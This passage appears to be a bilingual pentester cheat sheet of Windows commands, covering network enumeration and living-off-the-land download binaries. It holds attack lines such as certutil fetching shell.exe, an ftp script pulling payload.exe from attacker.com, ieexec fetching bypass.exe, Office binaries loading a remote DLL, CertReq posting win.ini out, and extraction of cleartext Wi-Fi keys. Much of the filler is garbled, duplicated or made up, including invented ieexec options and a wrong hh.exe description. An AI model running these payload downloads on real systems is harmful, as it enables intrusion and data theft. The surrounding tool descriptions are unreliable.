其中,`<drive_letter>` 是要分配给共享的驱动器号,`\\server\share` 是共享的路径,`/USER` 参数用于指定用户名,`<password>` 是用户的密码。
#### 断开共享连接
要断开与共享的连接,可以使用以下命令:
```plaintext
net use <drive_letter> /DELETE
```
其中,`<drive_letter>` 是要断开连接的驱动器号。
```bash
net view #Get a list of computers
net view /all /domain [domainname] #Shares on the domains
net view \\computer /ALL #List shares of a computer
net use x: \\computer\share #Mount the share locally
net share #Check current shares
```
### Wifi无线网络
#### 查看已连接的Wifi网络
```plaintext
netsh wlan show interfaces
```
#### 查看可用的Wifi网络
```plaintext
netsh wlan show networks
```
#### 连接到Wifi网络
```plaintext
netsh wlan connect name="Wifi名称"
```
#### 断开Wifi网络连接
```plaintext
netsh wlan disconnect
```
#### 查看已保存的Wifi密码
```plaintext
netsh wlan show profile name="Wifi名称" key=clear
```
#### 忘记已保存的Wifi密码
```plaintext
netsh wlan delete profile name="Wifi名称"
```
#### 创建Wifi热点
```plaintext
netsh wlan set hostednetwork mode=allow ssid="热点名称" key="密码"
netsh wlan start hostednetwork
```
#### 停止Wifi热点
```plaintext
netsh wlan stop hostednetwork
```
#### 查看已连接的Wifi客户端
```plaintext
netsh wlan show hostednetwork
```
#### 共享网络连接
```plaintext
netsh wlan set hostednetwork mode=allow ssid="热点名称" key="密码"
netsh wlan start hostednetwork
```
#### 停止网络连接共享
```plaintext
netsh wlan stop hostednetwork
```
#### 查看已共享的网络连接
```plaintext
netsh wlan show hostednetwork
```
#### 修改Wifi热点设置
```plaintext
netsh wlan set hostednetwork mode=allow ssid="热点名称" key="密码"
netsh wlan stop hostednetwork
netsh wlan start hostednetwork
```
```bash
netsh wlan show profile #AP SSID
netsh wlan show profile <SSID> key=clear #Get Cleartext Pass
```
### SNMP
SNMPSimple Network Management Protocol是一种用于管理和监控网络设备的协议。它允许管理员通过发送和接收消息来获取有关设备的信息例如系统状态、网络流量和错误报告。SNMP使用基于UDP的传输协议并使用MIBManagement Information Base来定义设备上可用的信息。攻击者可以利用SNMP协议来收集有关目标网络设备的信息例如操作系统版本、开放端口和配置设置。这些信息可以帮助攻击者识别潜在的漏洞和攻击路径。
```
reg query HKLM\SYSTEM\CurrentControlSet\Services\SNMP /s
```
### 网络接口
Network interfaces, also known as network adapters or NICs (Network Interface Cards), are hardware devices that allow computers to connect to a network. They provide the necessary physical connection between the computer and the network, enabling data transmission.
网络接口也称为网络适配器或NIC网络接口卡是允许计算机连接到网络的硬件设备。它们提供了计算机与网络之间的必要物理连接实现数据传输。
In Windows, you can view and manage network interfaces using the `ipconfig` command. This command displays detailed information about each network interface, including its IP address, subnet mask, default gateway, and more.
在Windows中您可以使用`ipconfig`命令查看和管理网络接口。该命令显示每个网络接口的详细信息包括其IP地址、子网掩码、默认网关等。
To view the network interfaces, open a command prompt and type `ipconfig`. This will display a list of all network interfaces on the system, along with their corresponding information.
要查看网络接口,请打开命令提示符并键入`ipconfig`。这将显示系统上所有网络接口的列表,以及它们的相应信息。
You can also use the `ipconfig /all` command to view additional information about the network interfaces, such as the MAC address, DNS servers, and DHCP lease information.
您还可以使用`ipconfig /all`命令查看有关网络接口的其他信息例如MAC地址、DNS服务器和DHCP租约信息。
In addition to `ipconfig`, you can use the `netsh` command to manage network interfaces. The `netsh` command provides more advanced options for configuring and troubleshooting network interfaces.
除了`ipconfig`,您还可以使用`netsh`命令来管理网络接口。`netsh`命令提供了更高级的选项,用于配置和故障排除网络接口。
For example, you can use the `netsh interface show interface` command to display a list of all network interfaces, along with their operational status and other information.
例如,您可以使用`netsh interface show interface`命令显示所有网络接口的列表,以及它们的操作状态和其他信息。
Understanding and managing network interfaces is essential for network troubleshooting and configuration. By using the appropriate commands, you can easily view and modify network interface settings to ensure optimal network connectivity.
```bash
ipconfig /all
```
### ARP表
The ARP (Address Resolution Protocol) table is a network mapping table that associates IP addresses with their corresponding MAC addresses. It is used by network devices to determine the MAC address of a destination IP address before sending data packets. The ARP table is stored in the memory of a device and is constantly updated as devices communicate on the network.
To view the ARP table on a Windows system, you can use the `arp` command in the command prompt. Simply open the command prompt and type `arp -a` to display the ARP table. The output will show the IP addresses and corresponding MAC addresses of devices that the system has communicated with.
The ARP table is useful for troubleshooting network connectivity issues, identifying devices on the network, and detecting potential ARP spoofing attacks. By analyzing the ARP table, you can verify if the correct MAC address is associated with each IP address and identify any discrepancies or suspicious entries.
It's important to note that the ARP table is specific to each device and is not shared across the network. Therefore, each device maintains its own ARP table based on its network interactions.
```bash
arp -A
```
## 下载
Bitsadmin.exe
```
bitsadmin /create 1 bitsadmin /addfile 1 https://live.sysinternals.com/autoruns.exe c:\data\playfolder\autoruns.exe bitsadmin /RESUME 1 bitsadmin /complete 1
```
# CertReq.exe
CertReq.exe is a command-line tool in Windows that is used to create and submit certificate requests to a certification authority (CA). It is commonly used by system administrators and security professionals for managing certificates in a Windows environment.
## Syntax
The basic syntax for using CertReq.exe is as follows:
```plaintext
CertReq [options] [request_file] [output_file]
```
- `options`: Specifies various options for the certificate request.
- `request_file`: Specifies the input file that contains the certificate request information.
- `output_file`: Specifies the output file where the resulting certificate will be saved.
## Examples
Here are some examples of how CertReq.exe can be used:
1. Generate a certificate request using a template:
```plaintext
CertReq -new -f template.inf -r -p "password" request.req
```
2. Submit a certificate request to a CA:
```plaintext
CertReq -submit -config "https://ca.example.com/certsrv" -attrib "CertificateTemplate:WebServer" request.req response.cer
```
3. Accept a certificate response and install the certificate:
```plaintext
CertReq -accept -machine response.cer
```
## Conclusion
CertReq.exe is a powerful command-line tool for managing certificates in a Windows environment. It provides various options for creating and submitting certificate requests, as well as accepting and installing certificate responses. System administrators and security professionals can leverage CertReq.exe to streamline the certificate management process and ensure the security of their Windows systems.
```
CertReq -Post -config https://example.org/ c:\windows\win.ini output.txt
```
Certutil.exe 是一个 Windows 命令行实用程序,用于操作和管理证书、证书颁发机构 (CA) 和证书存储。它提供了许多功能,包括查看、导出、导入和验证证书,以及执行其他与证书相关的操作。以下是一些常用的 Certutil.exe 命令:
- **certutil -viewstore**:查看证书存储中的证书。
- **certutil -addstore**:将证书添加到证书存储。
- **certutil -delstore**:从证书存储中删除证书。
- **certutil -exportPFX**:将证书导出为 PFX 文件。
- **certutil -importPFX**:从 PFX 文件导入证书。
- **certutil -verify**:验证证书的有效性。
- **certutil -dump**:显示证书的详细信息。
要了解更多 Certutil.exe 命令和用法,请参考 Microsoft 官方文档。
```
certutil.exe -urlcache -split -f "http://10.10.14.13:8000/shell.exe" s.exe
```
# Basic CMD for Pentesters
## Introduction
This document provides a list of basic CMD commands that can be useful for pentesters during their engagements. These commands can help in various tasks such as information gathering, privilege escalation, lateral movement, and persistence.
## CMD Commands
### 1. Tasklist
The `tasklist` command displays a list of all running processes on the system. This can be useful for identifying suspicious or malicious processes.
```plaintext
tasklist
```
### 2. Netstat
The `netstat` command displays active network connections, listening ports, and related information. It can help identify open ports and established connections.
```plaintext
netstat -ano
```
### 3. Ipconfig
The `ipconfig` command displays the IP configuration for all network interfaces on the system. It can be used to identify the IP address, subnet mask, and default gateway.
```plaintext
ipconfig /all
```
### 4. Net
The `net` command is used for various network-related tasks. Some useful subcommands include:
- `net user` - Displays user accounts on the system.
- `net group` - Displays group information.
- `net localgroup` - Displays local group information.
- `net share` - Displays shared resources.
```plaintext
net user
```
### 5. Systeminfo
The `systeminfo` command displays detailed information about the system, including the operating system version, hardware information, and installed patches.
```plaintext
systeminfo
```
### 6. Reg
The `reg` command is used to manage the Windows Registry. Some useful subcommands include:
- `reg query` - Displays the values and subkeys of a specified registry key.
- `reg add` - Adds a new registry entry.
- `reg delete` - Deletes a registry entry.
- `reg export` - Exports a registry key to a file.
```plaintext
reg query HKLM\Software
```
### 7. Schtasks
The `schtasks` command is used to manage scheduled tasks on the system. It can be used to create, modify, or delete scheduled tasks.
```plaintext
schtasks /query /fo LIST
```
### 8. Netsh
The `netsh` command is used to configure and monitor network settings. Some useful subcommands include:
- `netsh firewall` - Manages the Windows Firewall.
- `netsh wlan` - Manages wireless network settings.
- `netsh interface` - Manages network interfaces.
```plaintext
netsh firewall show state
```
### 9. WMIC
The `wmic` command provides a command-line interface to the Windows Management Instrumentation (WMI) infrastructure. It can be used to retrieve information about various system components.
```plaintext
wmic process get name, processid
```
### 10. Taskkill
The `taskkill` command is used to terminate a running process. It can be used to forcefully terminate a process that is not responding or is malicious.
```plaintext
taskkill /f /pid <process_id>
```
## Conclusion
These basic CMD commands can be helpful for pentesters during their engagements. However, it is important to note that these commands should be used responsibly and ethically, following all applicable laws and regulations.
```
set "SYSTEMROOT=C:\Windows\Temp" && cmd /c desktopimgdownldr.exe /lockscreenurl:https://domain.com:8080/file.ext /eventName:desktopimgdownldr
```
Diantz.exe
```
diantz.exe \\remotemachine\pathToFile\file.exe c:\destinationFolder\file.cab
```
# Esentutl.exe
`Esentutl.exe` 是一个用于管理和维护 Windows 操作系统中的 Extensible Storage Engine (ESE) 数据库的命令行工具。ESE 是一种嵌入式数据库引擎,广泛用于 Windows 系统中的许多应用程序,如 Active Directory、Windows Update 和 Windows Search。
## 基本用法
以下是 `Esentutl.exe` 的一些常用命令和用法:
### 检查数据库状态
```plaintext
esentutl /mh <database_file>
```
此命令用于检查指定数据库文件的状态,包括数据库的版本、日志文件的状态以及数据库的一致性。
### 修复数据库
```plaintext
esentutl /p <database_file>
```
此命令用于修复指定的数据库文件。修复过程将尝试恢复损坏的数据库文件,并将其置于一致的状态。
### 恢复数据库
```plaintext
esentutl /r <log_file> /l <log_folder> /d <database_folder> /i
```
此命令用于从日志文件和数据库文件的备份中恢复数据库。需要指定日志文件、日志文件夹和数据库文件夹的路径。
### 备份数据库
```plaintext
esentutl /y <database_file> /d <backup_folder>
```
此命令用于创建数据库文件的备份。需要指定数据库文件和备份文件夹的路径。
## 注意事项
- 在使用 `Esentutl.exe` 之前,请确保已经备份了相关的数据库文件和日志文件。
- 在执行修复和恢复操作之前,建议先停止与数据库相关的服务和应用程序。
- 使用 `Esentutl.exe` 进行数据库操作需要管理员权限。
更多关于 `Esentutl.exe` 的详细信息,请参考官方文档。
```
esentutl.exe /y \\live.sysinternals.com\tools\adrestore.exe /d \\otherwebdavserver\webdav\adrestore.exe /o
```
## Expand.exe
`Expand.exe` 是一个 Windows 命令行实用程序,用于解压缩文件。它可以将压缩文件(如 `.cab` 文件)解压缩到指定的目录中。
### 语法
```plaintext
expand.exe [-r] source destination
```
### 参数
- `-r`:可选参数,用于递归地解压缩源文件夹中的所有文件。
- `source`:要解压缩的文件路径。
- `destination`:解压缩文件的目标路径。
### 示例
```plaintext
expand.exe -r C:\archive.cab C:\extracted_files
```
以上示例将递归地解压缩 `C:\archive.cab` 文件中的所有文件,并将其解压缩到 `C:\extracted_files` 目录中。
```
expand \\webdav\folder\file.bat c:\ADS\file.bat
```
# Extrac32.exe
`Extrac32.exe` 是 Windows 操作系统中的一个命令行实用程序,用于解压缩文件。它可以解压缩 `.cab` 文件,这是一种常见的压缩文件格式。
## 语法
```plaintext
extrac32 [/Y] [/A] [/D] [/L] [/Q] [/R] [/T:folder] [/X] [/Z] source destination
```
## 参数
- `/Y`:在解压缩时不提示确认。
- `/A`:将文件解压缩到指定的文件夹中。
- `/D`:在解压缩时显示详细的进度信息。
- `/L`:将文件解压缩到指定的文件夹中,但不创建文件夹。
- `/Q`:在解压缩时不显示任何信息。
- `/R`:在解压缩时覆盖现有的文件。
- `/T:folder`:将文件解压缩到指定的文件夹中。
- `/X`:在解压缩时不保留源文件的路径。
- `/Z`:在解压缩时显示详细的进度信息。
## 示例
```plaintext
extrac32 /Y /A /D /R /T:C:\temp /Z C:\archive.cab C:\destination
```
此命令将解压缩 `C:\archive.cab` 文件到 `C:\destination` 文件夹中,并覆盖现有的文件。解压缩过程中将显示详细的进度信息,并将源文件解压缩到 `C:\temp` 文件夹中。
```
extrac32 /Y /C \\webdavserver\share\test.txt C:\folder\test.txt
```
## Findstr.exe
`findstr.exe` 是 Windows 操作系统中的一个命令行工具,用于在文件中搜索指定的字符串。它可以用于查找文本文件中的特定内容,也可以用于在多个文件中搜索匹配的字符串。
### 语法
```plaintext
findstr [/b] [/e] [/l] [/r] [/s] [/i] [/x] [/v] [/n] [/m] [/o] [/p] [/g:File] [/f:File] [/c:String] [/d:DirList] [/a:ColorAttribute] [Strings] [[Drive:][Path] FileName[ ...]]
```
### 参数
- `/b`:匹配以指定字符串开头的行。
- `/e`:匹配以指定字符串结尾的行。
- `/l`:将搜索模式视为字面值,而不是正则表达式。
- `/r`:使用正则表达式搜索模式。
- `/s`:在指定目录及其子目录中递归搜索。
- `/i`:忽略大小写进行匹配。
- `/x`:仅匹配整个行,而不是部分匹配。
- `/v`:仅显示不匹配的行。
- `/n`:在每行前显示行号。
- `/m`:仅显示包含匹配项的文件名。
- `/o`:在每个匹配项前显示偏移量。
- `/p`:仅显示包含匹配项的文件名,而不显示匹配的行。
- `/g:File`:从指定的文件中获取搜索字符串。
- `/f:File`:从指定的文件中获取搜索文件列表。
- `/c:String`:指定要搜索的字符串。
- `/d:DirList`:在指定的目录列表中搜索。
- `/a:ColorAttribute`:指定输出文本的颜色属性。
### 示例
- 在文件中搜索包含指定字符串的行:
```plaintext
findstr "search_string" filename.txt
```
- 在多个文件中搜索包含指定字符串的行:
```plaintext
findstr "search_string" file1.txt file2.txt file3.txt
```
- 在指定目录及其子目录中递归搜索包含指定字符串的行:
```plaintext
findstr /s "search_string" C:\path\to\directory
```
- 使用正则表达式搜索模式:
```plaintext
findstr /r "regex_pattern" filename.txt
```
- 从文件中获取搜索字符串:
```plaintext
findstr /g:search_strings.txt filename.txt
```
- 从文件中获取搜索文件列表:
```plaintext
findstr /f:file_list.txt "search_string"
```
- 忽略大小写进行匹配:
```plaintext
findstr /i "search_string" filename.txt
```
- 仅匹配以指定字符串开头的行:
```plaintext
findstr /b "search_string" filename.txt
```
- 仅匹配以指定字符串结尾的行:
```plaintext
findstr /e "search_string" filename.txt
```
- 仅显示不匹配的行:
```plaintext
findstr /v "search_string" filename.txt
```
- 在每行前显示行号:
```plaintext
findstr /n "search_string" filename.txt
```
- 仅显示包含匹配项的文件名:
```plaintext
findstr /m "search_string" filename.txt
```
- 在每个匹配项前显示偏移量:
```plaintext
findstr /o "search_string" filename.txt
```
- 仅显示包含匹配项的文件名,而不显示匹配的行:
```plaintext
findstr /p "search_string" filename.txt
```
- 指定输出文本的颜色属性:
```plaintext
findstr /a:ColorAttribute "search_string" filename.txt
```
### 注意事项
- `findstr.exe` 默认情况下区分大小写,如果需要忽略大小写进行匹配,可以使用 `/i` 参数。
- `findstr.exe` 支持使用正则表达式进行搜索,可以使用 `/r` 参数。
- `findstr.exe` 可以在文本文件中搜索指定的字符串,也可以在多个文件中搜索匹配的字符串。
- `findstr.exe` 可以递归搜索指定目录及其子目录中的文件。
- `findstr.exe` 可以从文件中获取搜索字符串或搜索文件列表。
- `findstr.exe` 可以根据需要显示不匹配的行、行号、文件名等信息。
```
findstr /V /L W3AllLov3DonaldTrump \\webdavserver\folder\file.exe > c:\ADS\file.exe
```
# Ftp.exe
`ftp.exe` is a command-line utility in Windows that allows users to transfer files to and from a remote computer using the File Transfer Protocol (FTP). It is a built-in tool that comes with the Windows operating system.
## Syntax
The basic syntax for using `ftp.exe` is as follows:
```plaintext
ftp [-v] [-d] [-i] [-n] [-g] [-s:filename] [-a] [-w:windowsize] [-A] [host]
```
## Options
Here are some commonly used options with `ftp.exe`:
- `-v`: Enables verbose mode, which displays detailed information about the FTP connection and file transfers.
- `-d`: Enables debugging mode, which provides additional information for troubleshooting purposes.
- `-i`: Disables interactive mode, which suppresses prompts for user confirmation during file transfers.
- `-n`: Suppresses the automatic login feature, allowing the user to manually log in to the FTP server.
- `-g`: Disables filename globbing, which prevents wildcard characters from being expanded in file names.
- `-s:filename`: Specifies a text file containing FTP commands to be executed automatically.
- `-a`: Uses ASCII mode for file transfers, which is suitable for transferring text files.
- `-w:windowsize`: Specifies the size of the receive window for data transfers.
- `-A`: Enables anonymous FTP login, allowing users to log in without providing a username or password.
## Examples
Here are some examples of how to use `ftp.exe`:
1. Connect to an FTP server:
```plaintext
ftp example.com
```
2. Upload a file to the FTP server:
```plaintext
put filename
```
3. Download a file from the FTP server:
```plaintext
get filename
```
4. List files and directories on the FTP server:
```plaintext
ls
```
5. Change the current directory on the FTP server:
```plaintext
cd directory
```
6. Disconnect from the FTP server:
```plaintext
bye
```
## Conclusion
`ftp.exe` is a useful command-line tool for transferring files to and from remote computers using FTP. By understanding its syntax and options, you can effectively use this utility for various file transfer operations.
```
cmd.exe /c "@echo open attacker.com 21>ftp.txt&@echo USER attacker>>ftp.txt&@echo PASS PaSsWoRd>>ftp.txt&@echo binary>>ftp.txt&@echo GET /payload.exe>>ftp.txt&@echo quit>>ftp.txt&@ftp -s:ftp.txt -v"
```
GfxDownloadWrapper.exe
```
C:\Windows\System32\DriverStore\FileRepository\igdlh64.inf_amd64_[0-9]+\GfxDownloadWrapper.exe "URL" "DESTINATION FILE"
```
# Hh.exe
`hh.exe` is a Windows executable that is used to launch the Windows Help and Support Center. It is commonly found in the `C:\Windows` directory.
## Usage
To launch the Help and Support Center using `hh.exe`, open a command prompt and run the following command:
```
hh.exe helpctr
```
This will open the Help and Support Center window, where you can search for help topics and access various Windows support resources.
## Command-Line Options
`hh.exe` supports several command-line options that can be used to customize its behavior. Here are some commonly used options:
- `/mapid <mapid>`: Opens the specified Help topic directly.
- `/url <URL>`: Opens the specified URL in the default browser.
- `/find <text>`: Searches for the specified text in the Help content.
- `/index <keyword>`: Displays the Help topics that match the specified keyword.
- `/show <window>`: Displays the specified window in the Help and Support Center.
For example, to open a specific Help topic with the map ID `1234`, you can use the following command:
```
hh.exe helpctr /mapid 1234
```
## Security Considerations
`hh.exe` is a legitimate Windows executable and is not inherently malicious. However, like any other executable, it can be abused by attackers to execute arbitrary commands or launch malicious payloads.
To mitigate the risk of abuse, it is important to ensure that `hh.exe` is only executed from trusted locations and that the command-line options are properly validated. Additionally, keeping the operating system and software up to date with the latest security patches can help prevent potential vulnerabilities from being exploited.
## References
- [Microsoft Docs: Hh.exe Command-Line Options](https://docs.microsoft.com/en-us/previous-versions/windows/desktop/hh398365(v=vs.85))
```
HH.exe http://some.url/script.ps1
```
# Ieexec.exe
`ieexec.exe` is a command-line utility in Windows that allows you to execute Internet Explorer processes with specific options. It is commonly used by pentesters and hackers to perform various tasks related to web browsing and exploitation.
## Usage
The basic syntax of `ieexec.exe` is as follows:
```
ieexec.exe [options] [URL]
```
- `[options]`: Specifies the command-line options for `ieexec.exe`. These options can be used to control the behavior of Internet Explorer processes.
- `[URL]`: Specifies the URL of the website to be opened in Internet Explorer.
## Examples
Here are some examples of how `ieexec.exe` can be used:
1. Open a website in Internet Explorer:
```
ieexec.exe https://example.com
```
2. Open a website in Internet Explorer with specific options:
```
ieexec.exe --new-window --no-proxy-server https://example.com
```
3. Execute JavaScript code in Internet Explorer:
```
ieexec.exe --script "alert('Hello, world!');"
```
4. Take a screenshot of a website in Internet Explorer:
```
ieexec.exe --screenshot screenshot.png https://example.com
```
## Conclusion
`ieexec.exe` is a useful tool for pentesters and hackers who need to interact with Internet Explorer processes from the command line. It provides various options for controlling the behavior of Internet Explorer and performing tasks such as opening websites, executing JavaScript code, and taking screenshots.
```
ieexec.exe http://x.x.x.x:8080/bypass.exe
```
# Makecab.exe
Makecab.exe is a command-line tool in Windows that is used to create cabinet (.cab) files. Cabinet files are compressed archives that can contain multiple files and folders. This tool is commonly used for packaging and compressing files for distribution or installation purposes.
## Syntax
```
makecab [/V[n]] [/D var=value ...] [/L dir] source [destination]
```
## Parameters
- `/V[n]`: Specifies the verbosity level of the output. Use `/V` for normal output and `/Vn` for more verbose output (where `n` is a number from 1 to 3).
- `/D var=value`: Defines a variable and its value for use in the makecab directive section.
- `/L dir`: Specifies the directory where the output files will be placed.
- `source`: Specifies the file or files to be compressed.
- `destination`: Specifies the name of the cabinet file to be created.
## Examples
1. Compress a single file:
```
makecab file.txt
```
2. Compress multiple files:
```
makecab file1.txt file2.txt file3.txt
```
3. Specify the output directory:
```
makecab /L C:\Output file.txt
```
4. Set verbosity level to 2:
```
makecab /V2 file.txt
```
## Additional Information
- The makecab directive section allows you to specify additional instructions for the compression process, such as file attributes, disk names, and more.
- Cabinet files can be extracted using the `expand` command or by double-clicking on them in Windows Explorer.
```
makecab \\webdavserver\webdav\file.exe C:\Folder\file.cab
```
`MpCmdRun.exe` 是 Windows Defender 的命令行实用程序。它允许用户在命令行界面下执行与 Windows Defender 相关的操作,如扫描文件、更新病毒定义和配置 Windows Defender 设置等。以下是一些常用的 `MpCmdRun.exe` 命令:
- 扫描文件或文件夹:`MpCmdRun.exe -Scan -ScanType 3 -File <路径>`
- 扫描全盘:`MpCmdRun.exe -Scan -ScanType 2`
- 更新病毒定义:`MpCmdRun.exe -SignatureUpdate`
- 查看病毒扫描日志:`MpCmdRun.exe -GetFiles -ScanType 3 -LogFile <日志文件路径>`
- 禁用实时保护:`MpCmdRun.exe -DisableRealtimeMonitoring`
- 启用实时保护:`MpCmdRun.exe -EnableRealtimeMonitoring`
- 查看 Windows Defender 设置:`MpCmdRun.exe -GetFiles -ScanType 3 -LogFile <日志文件路径>`
请注意,执行 `MpCmdRun.exe` 命令需要管理员权限。
```
MpCmdRun.exe -DownloadFile -url <URL> -path <path> //Windows Defender executable
```
# Replace.exe
`Replace.exe` is a command-line tool in Windows that allows you to replace files in a specified directory. It can be useful for various purposes, including replacing system files, modifying configurations, or performing other file-related operations.
## Syntax
The syntax for using `Replace.exe` is as follows:
```plaintext
replace.exe <source_file> <destination_file> [/A] [/P] [/R] [/W]
```
- `<source_file>`: Specifies the file to be copied.
- `<destination_file>`: Specifies the location and name of the new file.
- `/A`: Adds the file attributes of the source file to the destination file.
- `/P`: Prompts for confirmation before replacing an existing file.
- `/R`: Replaces read-only files.
- `/W`: Waits for you to insert a disk before replacing files.
## Examples
Here are some examples of how to use `Replace.exe`:
1. Replace a file without prompting for confirmation:
```plaintext
replace.exe C:\path\to\source\file.txt C:\path\to\destination\file.txt /P
```
2. Replace a file and add the file attributes of the source file to the destination file:
```plaintext
replace.exe C:\path\to\source\file.txt C:\path\to\destination\file.txt /A
```
3. Replace a read-only file:
```plaintext
replace.exe C:\path\to\source\file.txt C:\path\to\destination\file.txt /R
```
4. Replace a file and wait for disk insertion:
```plaintext
replace.exe C:\path\to\source\file.txt C:\path\to\destination\file.txt /W
```
Note: Make sure to replace `C:\path\to\source\file.txt` with the actual path and name of the source file, and `C:\path\to\destination\file.txt` with the actual path and name of the destination file.
## Conclusion
`Replace.exe` is a powerful command-line tool in Windows that allows you to replace files in a specified directory. By understanding its syntax and options, you can efficiently perform file replacement operations as needed.
```
replace.exe \\webdav.host.com\foo\bar.exe c:\outdir /A
```
# Basic CMD for Pentesters
## Introduction
This document provides a list of basic CMD commands that can be useful for pentesters during their engagements. These commands can help in gathering information, performing reconnaissance, and executing various tasks on a Windows system.
## CMD Commands
### 1. Tasklist
The `tasklist` command displays a list of all running processes on the system. This can be useful for identifying any suspicious or malicious processes.
```plaintext
tasklist
```
### 2. Netstat
The `netstat` command displays active network connections, listening ports, and related information. It can help in identifying any unauthorized network connections or open ports.
```plaintext
netstat -ano
```
### 3. Ipconfig
The `ipconfig` command displays the IP configuration of all network interfaces on the system. It can be used to gather information about the network settings of the target system.
```plaintext
ipconfig /all
```
### 4. Net
The `net` command is used for various network-related operations. Some useful subcommands include:
- `net user` - Displays information about user accounts on the system.
- `net group` - Displays information about user groups on the system.
- `net localgroup` - Displays information about local groups on the system.
```plaintext
net user
net group
net localgroup
```
### 5. Systeminfo
The `systeminfo` command displays detailed information about the system, including the operating system version, hardware configuration, and installed software. This can be useful for identifying vulnerabilities or outdated software.
```plaintext
systeminfo
```
### 6. Reg
The `reg` command is used to manage the Windows Registry. Some useful subcommands include:
- `reg query` - Displays the values and subkeys of a specified registry key.
- `reg add` - Adds a new registry key or value.
- `reg delete` - Deletes a specified registry key or value.
```plaintext
reg query HKLM\Software
reg add HKCU\Software\NewKey
reg delete HKLM\Software\OldKey
```
### 7. Taskkill
The `taskkill` command is used to terminate a running process. It can be useful for stopping any malicious processes or unwanted applications.
```plaintext
taskkill /IM process_name.exe /F
```
### 8. Schtasks
The `schtasks` command is used to manage scheduled tasks on the system. It can be used to create, modify, or delete scheduled tasks.
```plaintext
schtasks /Create /SC DAILY /TN "TaskName" /TR "C:\path\to\executable.exe" /ST 12:00
schtasks /Change /TN "TaskName" /RU "SYSTEM"
schtasks /Delete /TN "TaskName"
```
### 9. Cipher
The `cipher` command is used to manage file encryption on NTFS volumes. It can be used to encrypt or decrypt files and folders.
```plaintext
cipher /E /S:C:\path\to\folder
cipher /D /S:C:\path\to\folder
```
### 10. Eventvwr
The `eventvwr` command opens the Event Viewer, which displays logs and events recorded by the system. It can be used to analyze system events and identify any suspicious activities.
```plaintext
eventvwr
```
## Conclusion
These basic CMD commands can be helpful for pentesters during their engagements. However, it is important to note that these commands should be used responsibly and in accordance with legal and ethical guidelines.
```
Excel.exe http://192.168.1.10/TeamsAddinLoader.dll
```
# Powerpnt.exe
Powerpnt.exe is the executable file for Microsoft PowerPoint, a popular presentation software. It is commonly found on Windows operating systems.
## Usage
To launch PowerPoint using the command prompt, you can use the following command:
```
powerpnt.exe
```
This will open the PowerPoint application, allowing you to create, edit, and present slideshows.
## Command Line Options
Powerpnt.exe supports various command line options that can be used to perform specific tasks. Here are some commonly used options:
- `/s` - Starts PowerPoint in slideshow mode.
- `/n` - Starts a new instance of PowerPoint.
- `/f <filename>` - Opens the specified file in PowerPoint.
- `/m <macro>` - Runs the specified macro when PowerPoint starts.
- `/pt <printername>` - Prints the specified file to the specified printer.
- `/p <filename>` - Prints the specified file without opening PowerPoint.
## Example
To open a PowerPoint file named "presentation.pptx" using the command prompt, you can use the following command:
```
powerpnt.exe /f presentation.pptx
```
This will open the "presentation.pptx" file in PowerPoint.
## Conclusion
Powerpnt.exe is a useful tool for working with PowerPoint files from the command line. By understanding its command line options, you can automate tasks and perform operations more efficiently.
```
Powerpnt.exe "http://192.168.1.10/TeamsAddinLoader.dll"
```
# Squirrel.exe
Squirrel.exe is a command-line utility that allows you to interact with the Squirrel framework. It is commonly used by developers to manage and deploy applications built with Squirrel.
## Usage
To use Squirrel.exe, open a command prompt and navigate to the directory where the executable is located. Then, you can run various commands to perform different actions.
### Install
The `install` command is used to install an application. It takes the path to the application package as an argument.
```shell
squirrel.exe install <path_to_package>
```
### Update
The `update` command is used to update an installed application. It takes the path to the updated application package as an argument.
```shell
squirrel.exe update <path_to_package>
```
### Uninstall
The `uninstall` command is used to uninstall an application. It takes the application name as an argument.
```shell
squirrel.exe uninstall <application_name>
```
### Other Commands
Squirrel.exe also provides other commands for managing applications, such as `list`, `releasify`, and `clean`. You can use the `--help` flag with any command to get more information about its usage.
## Conclusion
Squirrel.exe is a powerful command-line utility for managing applications built with the Squirrel framework. By using the various commands provided, you can easily install, update, and uninstall applications, making it a valuable tool for developers.
```
squirrel.exe --download [url to package]
```
# Update.exe
`Update.exe` is a common executable file found in Windows operating systems. It is used to update various software and system components. However, it can also be leveraged by attackers for malicious purposes.
## Malicious Use
Attackers can disguise malware or malicious scripts as `Update.exe` to trick users into running them. This can be done through various methods, such as phishing emails, compromised websites, or social engineering techniques.
Once executed, the malicious `Update.exe` can perform a wide range of actions, including:
- Installing additional malware or backdoors on the system.
- Modifying system settings or configurations.
- Stealing sensitive information, such as login credentials or personal data.
- Initiating unauthorized network connections.
- Exploiting vulnerabilities in the system or other software.
## Prevention and Mitigation
To protect against malicious `Update.exe` files, consider the following preventive measures:
1. **Exercise caution**: Be wary of downloading or running any files named `Update.exe` from untrusted sources.
2. **Keep software up to date**: Regularly update your operating system and software applications to patch any vulnerabilities that could be exploited by attackers.
3. **Use reliable security software**: Install and maintain reputable antivirus and anti-malware software to detect and block malicious files.
4. **Enable firewalls**: Enable and configure firewalls to monitor and control incoming and outgoing network traffic.
5. **Educate users**: Train users to be cautious when downloading files or clicking on links, especially from unknown or suspicious sources.
By following these preventive measures, you can reduce the risk of falling victim to malicious `Update.exe` files and protect your system from potential attacks.
```
Update.exe --download [url to package]
```
# Basic CMD for Pentesters
## Winword.exe
`winword.exe` is the executable file for Microsoft Word, a popular word processing program. It is commonly found on Windows operating systems.
### Execution
To execute `winword.exe`, you can simply type `winword` in the command prompt and press Enter. This will launch the Microsoft Word application.
```
winword
```
### Command Line Arguments
`winword.exe` supports various command line arguments that can be used to perform specific actions or tasks. Here are some commonly used arguments:
- `/n` - Opens a new instance of Microsoft Word.
- `/t` - Opens a specified file.
- `/m` - Executes a specific macro or command.
- `/q` - Starts Word without displaying the splash screen.
To use these arguments, you can append them to the `winword` command. For example, to open a specific file, you can use the `/t` argument followed by the file path:
```
winword /t C:\path\to\file.docx
```
### Additional Information
- `winword.exe` is typically located in the `C:\Program Files\Microsoft Office\root\OfficeXX` directory, where `XX` represents the version number of Microsoft Office installed on the system.
- It is important to note that `winword.exe` can be used as a vector for malicious activities, such as executing macros or launching exploits. Therefore, it is crucial to ensure the security of Microsoft Word and its associated files.
```
winword.exe "http://192.168.1.10/TeamsAddinLoader.dll"
```
# Wsl.exe
`wsl.exe` 是 Windows Subsystem for Linux (WSL) 的可执行文件。WSL 是一种允许在 Windows 操作系统上运行 Linux 发行版的兼容层。通过运行 `wsl.exe`,用户可以在 Windows 环境中访问和使用 Linux 命令行工具和应用程序。
## 用法
要在 Windows 上运行 WSL请按下 `Win + R` 组合键打开运行对话框,然后输入 `wsl` 并按下回车键。这将启动默认的 Linux 发行版。
